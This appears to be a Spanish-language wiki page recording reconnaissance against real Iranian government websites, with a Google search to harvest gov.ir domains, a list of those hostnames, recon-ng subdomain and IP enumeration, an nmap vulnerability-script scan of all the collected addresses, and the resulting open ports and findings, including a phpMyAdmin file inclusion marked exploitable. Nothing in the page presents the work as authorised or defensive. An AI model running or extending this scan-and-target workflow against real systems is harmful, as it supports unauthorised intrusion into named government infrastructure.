1º Recolección de urls del gobierno mediante gob site:.ir en google\\ 
2º en la configuración de vim (.vimrc) crear el siguiente alias a éste comando:\\ 
<code bash>
command! LimpiarUrls %s/^\(http[s]\{0,1\}:\/\/\)\(\www\.\)\{0,1\}// | %s/\/$//
</code>
3º Ahora con hacer en vim Esc : LimpiarUrls las dejará listas para usarlas en los escáneres\\ 

{{ :iran:urls_gobierno_ir.txt.gz |}}
<code bash>
gunzip -c urls_gobierno_ir.txt.gz 
my.gov.ir
sso.my.gov.ir
tax.gov.ir
op.salamat.gov.ir
behdasht.gov.ir
irc.fda.gov.ir
mimt.gov.ir
csp.ihio.gov.ir
women.gov.ir
smttk.gov.ir
naciportal.inso.gov.ir
mfa.gov.ir
evisa.mfa.ir
fata.gov.ir
mcls.gov.ir
epl.irica.gov.ir
mikhak.mfa.gov.ir
hamrah.msy.gov.ir
president.ir
ticketing.ito.gov.ir
caa.gov.ir
tehran.farhang.gov.ir
farhang.gov.ir
</code>

{{ :iran:urls_ips_ir_recon_ng.tar.gz |}}\\ 

**Mismo procedimiento que con [[israel:urls-recon-ng|Israel]] para obtener subdominios a partir de las urls del gobierno obtenidas con google mediante búsqueda con gov site:.ir**\\ 

**Ips y subdominios obtenidos mediante recon-ng a partir del fichero urls_gobierno_ir.txt**\\ 

<code bash>
cat url_ip_ir.txt | wc -l
730
</code>
**Muchos, primeros 10, así se ven:**\\ 
<code bash>
cat url_ip_ir.txt | sed -n '1,10p'
cp.mfa.gov.ir                          109.201.11.102
mail.mfa.gov.ir                        109.201.11.102
office.behdasht.gov.ir                 172.21.60.201
sibservice95361.behdasht.gov.ir        172.21.66.145
sibservice95362.behdasht.gov.ir        172.21.66.145
hop.behdasht.gov.ir                    172.21.66.183
eo.behdasht.gov.ir                     172.21.67.127
eoffice.behdasht.gov.ir                172.21.67.127
maternaldeath.behdasht.gov.ir          172.21.67.192
educationportal.behdasht.gov.ir        185.123.208.106
</code>

**nmap a los puertos más comunes y vulnerables**\\ 

<code bash>
nmap -Pn -p 20-23,69,139,137,445,53,443,80,8080,8443 -sV --script vuln $(tar -xOzf urls_ips_ir_recon_ng.tar.gz url_ip_ir.txt | awk '{print $2}' | sort | uniq) -oN nmap_vuln_ir_pvarios.txt
</code>

**servicios abiertos**\\ 
<code bash>
cat nmap_vuln_ir_pvarios.txt | grep -Ex '^[0-9]+\/.*open.*' | sed -E 's/ {2,}/ /g' | sort | uniq
443/tcp open ssl/https
443/tcp open ssl/https ArvanCloud
443/tcp open ssl/https LiteSpeed
443/tcp open ssl/tcpwrapped
443/tcp open tcpwrapped
53/tcp open tcpwrapped
8080/tcp open http-proxy ArvanCloud
80/tcp open http LiteSpeed
80/tcp open http Microsoft IIS httpd 10.0
80/tcp open http nginx (reverse proxy)
80/tcp open tcpwrapped
8443/tcp open https-alt
8443/tcp open ssl/https-alt ArvanCloud
</code>

**servicios cerrados**\\ 
<code bash>
cat nmap_vuln_ir_pvarios.txt | grep -Ex '^[0-9]+\/.*closed.*' | sed -E 's/ {2,}/ /g' | sort | uniq
20/tcp closed ftp-data
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
445/tcp closed microsoft-ds
53/tcp closed domain
69/tcp closed tftp
8080/tcp closed http-proxy
80/tcp closed http
8443/tcp closed https-alt
</code>

**vulnerabilidades encontradas**\\ 

<code bash>
cat nmap_vuln_ir_pvarios.txt | sed -nE '/VULNERABLE:/{n;p}' | sort | uniq
|   Authentication bypass by HTTP verb tampering
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|   Slowloris DOS attack
</code>

Estado de cada una:
<code bash>
cat nmap_vuln_ir_pvarios.txt | sed -nE '/VULNERABLE:/{n;n;p}' | sort | uniq
|     State: LIKELY VULNERABLE
|     State: UNKNOWN (unable to test)
|     State: VULNERABLE
|     State: VULNERABLE (Exploitable)
</code>